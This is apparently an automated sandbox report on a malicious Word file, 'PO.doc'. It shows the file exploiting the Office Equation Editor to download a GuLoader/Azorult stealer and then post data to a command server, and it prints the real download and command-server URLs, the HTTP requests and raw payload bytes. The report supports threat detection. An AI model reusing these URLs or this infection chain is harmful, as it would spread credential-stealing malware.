Loading ...

Play interactive tourEdit tour

Analysis Report PO.doc

Overview

General Information

Sample Name:PO.doc
Analysis ID:288565
MD5:508243f1ac9630c24ba2e2075a79dd69
SHA1:34414b0929b642e7d6ec0503eaa1a39370c011d0
SHA256:07a7c9a2e1cfa993138d4e7dd1d2cbe608a99b9d701a156182c0ed20dafbffa7
Tags:doc

Most interesting Screenshot:

Detection

Azorult GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Azorult
Yara detected GuLoader
Binary contains a suspicious time stamp
Contains functionality to hide a thread from the debugger
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file contains strange resources
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries information about the installed CPU (vendor, model number etc)
Searches for user specific document files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 948 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2552 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • kkslhdgju.exe (PID: 2796 cmdline: C:\Users\user\AppData\Roaming\kkslhdgju.exe MD5: B645595EBA2B03EF2208D999C0028F8C)
      • kkslhdgju.exe (PID: 2936 cmdline: C:\Users\user\AppData\Roaming\kkslhdgju.exe MD5: B645595EBA2B03EF2208D999C0028F8C)
  • EQNEDT32.EXE (PID: 2976 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000003.2112654334.000000001E764000.00000004.00000001.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
    00000005.00000002.2114524442.00000000001B0000.00000040.00000001.sdmpJoeSecurity_GuLoaderYara detected GuLoaderJoe Security
      00000005.00000003.2114199227.000000001E760000.00000004.00000001.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
        Process Memory Space: kkslhdgju.exe PID: 2796JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
          Process Memory Space: kkslhdgju.exe PID: 2796JoeSecurity_GuLoaderYara detected GuLoaderJoe Security
            Click to see the 3 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
            Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\kkslhdgju.exe, CommandLine: C:\Users\user\AppData\Roaming\kkslhdgju.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\kkslhdgju.exe, NewProcessName: C:\Users\user\AppData\Roaming\kkslhdgju.exe, OriginalFileName: C:\Users\user\AppData\Roaming\kkslhdgju.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2552, ProcessCommandLine: C:\Users\user\AppData\Roaming\kkslhdgju.exe, ProcessId: 2796
            Sigma detected: EQNEDT32.EXE connecting to internetShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 150.95.104.240, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2552, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
            Sigma detected: File Dropped By EQNEDT32EXEShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2552, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ojabrocre[1].exe

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus / Scanner detection for submitted sampleShow sources
            Source: PO.docAvira: detected
            Antivirus detection for URL or domainShow sources
            Source: http://endoc.vn/wp-content/plugins/fire/ojabrocre.exeAvira URL Cloud: Label: malware
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ojabrocre[1].exeAvira: detection malicious, Label: TR/Injector.wtkyj
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ojabrocre[1].exeVirustotal: Detection: 51%Perma Link
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ojabrocre[1].exeReversingLabs: Detection: 19%
            Multi AV Scanner detection for submitted fileShow sources
            Source: PO.docVirustotal: Detection: 50%Perma Link
            Source: PO.docReversingLabs: Detection: 41%
            Source: 5.0.kkslhdgju.exe.400000.0.unpackAvira: Label: TR/Injector.wtkyj
            Source: 4.0.kkslhdgju.exe.400000.0.unpackAvira: Label: TR/Injector.wtkyj

            Exploits:

            barindex
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\kkslhdgju.exeJump to behavior
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: global trafficDNS query: name: endoc.vn
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 150.95.104.240:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 150.95.104.240:80

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.2.22:49167 -> 150.95.104.240:80
            Source: TrafficSnort IDS: 2029405 ET TROJAN Win32/AZORult V3.3 Client Checkin M2 192.168.2.22:49170 -> 46.4.227.96:80
            Source: TrafficSnort IDS: 2029136 ET TROJAN AZORult v3.3 Server Response M1 46.4.227.96:80 -> 192.168.2.22:49170
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 22 Sep 2020 10:30:04 GMTLast-Modified: Mon, 21 Sep 2020 23:37:36 GMTETag: "3a0248-c000-5afdb55ddb4a3"Content-Length: 49152Content-Type: application/x-msdownloadX-Varnish: 49012746Age: 0X-Cache: MISSAccept-Ranges: bytesConnection: keep-aliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 75 9f f9 db 31 fe 97 88 31 fe 97 88 31 fe 97 88 b2 e2 99 88 30 fe 97 88 7e dc 9e 88 30 fe 97 88 07 d8 9a 88 30 fe 97 88 52 69 63 68 31 fe 97 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 30 91 25 59 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 90 00 00 00 20 00 00 00 00 00 00 e4 13 00 00 00 10 00 00 00 a0 00 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 c0 00 00 00 10 00 00 ce 95 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 8b 00 00 28 00 00 00 00 b0 00 00 28 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 30 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 80 00 00 00 10 00 00 00 90 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 64 0a 00 00 00 a0 00 00 00 10 00 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 09 00 00 00 b0 00 00 00 10 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
            Source: global trafficHTTP traffic detected: GET /wp-content/plugins/fire/ojabrocre.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: endoc.vnConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /ojbro/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: chieftain-enterprises.comContent-Length: 105Cache-Control: no-cacheData Raw: 00 00 00 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 30 70 9d 33 14 8b 30 6d 8b 30 65 8b 30 6c 8b 30 6d 8b 30 63 8b 31 11 8b 30 67 ed 41 70 9d 31 70 9d 30 70 9d 35 11 ef Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp0p30m0e0l0m0c10gAp1p0p5
            Source: global trafficHTTP traffic detected: POST /ojbro/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: chieftain-enterprises.comContent-Length: 32443Cache-Control: no-cache
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E1A0581A-72A2-4470-89E8-B7D87A58E0E0}.tmpJump to behavior
            Source: global trafficHTTP traffic detected: GET /wp-content/plugins/fire/ojabrocre.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: endoc.vnConnection: Keep-Alive
            Source: kkslhdgju.exe, 00000005.00000002.2114859554.00000000005F6000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
            Source: kkslhdgju.exe, 00000005.00000002.2114859554.00000000005F6000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
            Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: unknownDNS traffic detected: queries for: endoc.vn
            Source: unknownHTTP traffic detected: POST /ojbro/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: chieftain-enterprises.comContent-Length: 105Cache-Control: no-cacheData Raw: 00 00 00 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 30 70 9d 33 14 8b 30 6d 8b 30 65 8b 30 6c 8b 30 6d 8b 30 63 8b 31 11 8b 30 67 ed 41 70 9d 31 70 9d 30 70 9d 35 11 ef Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp0p30m0e0l0m0c10gAp1p0p5
            Source: kkslhdgju.exe, 00000005.00000003.2104703311.000000001FBC8000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: kkslhdgju.exe, 00000005.00000003.2104703311.000000001FBC8000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmp, kkslhdgju.exe, 00000005.00000003.2114199227.000000001E760000.00000004.00000001.sdmpString found in binary or memory: http://chieftain-enterprises.com/ojbro/PL341/index.php
            Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmpString found in binary or memory: http://crl.micro
            Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmpString found in binary or memory: http://crl.microt%20IT%20TLS%20CA%202.crl0M
            Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: kkslhdgju.exe, 00000005.00000003.2104703311.000000001FBC8000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
            Source: kkslhdgju.exe, 00000005.00000003.2104703311.000000001FBC8000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: kkslhdgju.exe, 00000005.00000002.2115125908.000000000067F000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
            Source: kkslhdgju.exe, 00000005.00000003.2104703311.000000001FBC8000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: kkslhdgju.exe, 00000005.00000003.2104703311.000000001FBC8000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: kkslhdgju.exe, 00000005.00000003.2104703311.000000001FBC8000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
            Source: kkslhdgju.exe, 00000004.00000002.2093388494.0000000003127000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
            Source: kkslhdgju.exe, 00000004.00000002.2093388494.0000000003127000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
            Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: kkslhdgju.exe, 00000005.00000002.2115125908.000000000067F000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
            Source: kkslhdgju.exe, 00000005.00000003.2104703311.000000001FBC8000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: kkslhdgju.exe, 00000005.00000003.2104703311.000000001FBC8000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://ocsp.digicert.com0N
            Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.msocsp.com
            Source: kkslhdgju.exe, 00000005.00000002.2115125908.000000000067F000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.msocsp.com0
            Source: kkslhdgju.exe, 00000005.00000003.2104703311.000000001FBC8000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://ocsp.thawte.com0
            Source: kkslhdgju.exe, 00000004.00000002.2093388494.0000000003127000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
            Source: kkslhdgju.exe, 00000005.00000003.2112654334.000000001E764000.00000004.00000001.sdmpString found in binary or memory: http://templateupdater.dlinkddns.com/dk4o91fjw/tvrdemks.php):
            Source: kkslhdgju.exe, 00000005.00000003.2112654334.000000001E764000.00000004.00000001.sdmpString found in binary or memory: http://templateupdater.dlinkddns.com/dk4o91fjw/tvrdemks.php?c=chieftain-enterprise
            Source: kkslhdgju.exe, 00000005.00000003.2112654334.000000001E764000.00000004.00000001.sdmpString found in binary or memory: http://templateupdater.dlinkddns.com/dk4o91fjw/tvrdemks.php?c=chieftain-enterprises.com):
            Source: kkslhdgju.exe, 00000005.00000003.2112654334.000000001E764000.00000004.00000001.sdmpString found in binary or memory: http://templateupdater.dlinkddns.com/dk4o91fjw/tvrdemks.php?k):
            Source: kkslhdgju.exe, 00000005.00000003.2104703311.000000001FBC8000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
            Source: kkslhdgju.exe, 00000005.00000003.2104703311.000000001FBC8000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
            Source: kkslhdgju.exe, 00000005.00000003.2104703311.000000001FBC8000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
            Source: kkslhdgju.exe, 00000004.00000002.2093388494.0000000003127000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
            Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: kkslhdgju.exe, 00000004.00000002.2093388494.0000000003127000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
            Source: mozglue.dll.5.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
            Source: kkslhdgju.exe, 00000005.00000003.2104703311.000000001FBC8000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://www.mozilla.com0
            Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmpString found in binary or memory: https://gytnga.bl.files.1drv.com/
            Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmp, kkslhdgju.exe, 00000005.00000002.2114923970.0000000000610000.00000004.00000020.sdmpString found in binary or memory: https://gytnga.bl.files.1drv.com/y4mvmSB058la0fXmt7UEtU3LsS9BuuT7X93p5bs8HfAbCvzcoBitI2YFnSoS9RLTf6X
            Source: kkslhdgju.exe, 00000005.00000002.2114835463.00000000005EA000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/
            Source: kkslhdgju.exe, 00000005.00000002.2114524442.00000000001B0000.00000040.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=4C3F5C65A99DA195&resid=4C3F5C65A99DA195%21174&authkey=AN7jvD4
            Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: kkslhdgju.exe, 00000005.00000002.2115125908.000000000067F000.00000004.00000020.sdmp, mozglue.dll.5.drString found in binary or memory: https://www.digicert.com/CPS0
            Source: 72121753112444639744129.tmp.5.drString found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j0j46j0l2j46j0j5.485j0j8&sourceid=chro

            System Summary:

            barindex
            Office equation editor drops PE fileShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\kkslhdgju.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ojabrocre[1].exeJump to dropped file
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 4_2_003139D9 NtProtectVirtualMemory,4_2_003139D9
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 4_2_0031022A EnumWindows,NtSetInformationThread,CloseServiceHandle,TerminateProcess,4_2_0031022A
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 4_2_00312E76 NtSetInformationThread,CloseServiceHandle,TerminateProcess,4_2_00312E76
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 4_2_0031136D NtSetInformationThread,CloseServiceHandle,TerminateProcess,4_2_0031136D
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 4_2_00311481 NtSetInformationThread,CloseServiceHandle,TerminateProcess,4_2_00311481
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 4_2_00310D53 NtSetInformationThread,CloseServiceHandle,TerminateProcess,4_2_00310D53
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 4_2_0031214A NtWriteVirtualMemory,4_2_0031214A
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 4_2_00313E21 NtResumeThread,4_2_00313E21
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 4_2_00311A45 NtWriteVirtualMemory,4_2_00311A45
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 4_2_003102BD NtSetInformationThread,CloseServiceHandle,TerminateProcess,4_2_003102BD
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 4_2_00313ED2 NtResumeThread,4_2_00313ED2
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA044DC5_3_1FA044DC
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA044DC5_3_1FA044DC
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA044DC5_3_1FA044DC
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA044DC5_3_1FA044DC
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA0D0205_3_1FA0D020
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA0D0205_3_1FA0D020
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA0D0205_3_1FA0D020
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA0D0205_3_1FA0D020
